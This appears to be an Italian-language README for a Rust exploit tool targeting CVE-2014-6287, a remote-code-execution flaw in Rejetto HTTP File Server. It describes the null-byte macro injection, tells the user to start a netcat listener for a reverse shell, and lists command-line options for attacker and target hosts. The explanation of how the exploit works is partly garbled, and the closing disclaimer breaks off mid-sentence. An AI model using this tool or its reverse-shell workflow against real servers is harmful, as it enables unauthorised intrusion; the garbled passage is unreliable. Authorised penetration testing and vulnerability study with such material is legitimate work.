
Un'implementazione in Rust dell'exploit CVE-2014-6287 che colpisce Rejetto HTTP File Server (HFS) versioni 2.3x precedenti alla 2.3c.
Un'implementazione in Rust dell'exploit CVE-2014-6287 che colpisce Rejetto HTTP File Server (HFS) versioni 2.3x precedenti alla 2.3c.
CVE-2014-6287 è una vulnerabilità critica di esecuzione remota di codice in Rejetto HTTP File Server (HFS).
La funzione findMacroMarker in parserLib.pas in Rejetto HTTP File Server consente ad attaccanti remoti di eseguire programmi arbitrari tramite una sequenza %00 in un'azione di ricerca. Questa vulnerabilità consente agli attaccanti di aggirare la validazione dell'input e iniettare codice malevolo che viene eseguito sul sistema di destinazione.
L'exploit funziona nel seguente modo:
%00){. e .}Prima di eseguire l'exploit, configura un listener sulla tua macchina di attacco per ricevere la reverse shell:
# Replace <LPORT> with your desired listening port
nc -lvnp <LPORT>
cargo run -- -l <LHOST> -p <LPORT> -r <RHOST> [-t <RPORT>]
-l, --lhost <LHOST>: Il tuo indirizzo IP locale (macchina dell'attaccante)-p, --lport <LPORT>: La tua porta locale per la reverse shell-r, --rhost <RHOST>: Indirizzo IP del target (server HFS vulnerabile)-t, --rport <RPORT>: Porta del target (predefinita: 80)Questo strumento è destinato esclusivamente a scopi educativi e di test di penetrazione autorizzati. Utilizzalo in modo responsabile e solo su sistemi di tua proprietà o per cui hai esplicita autorizzazione a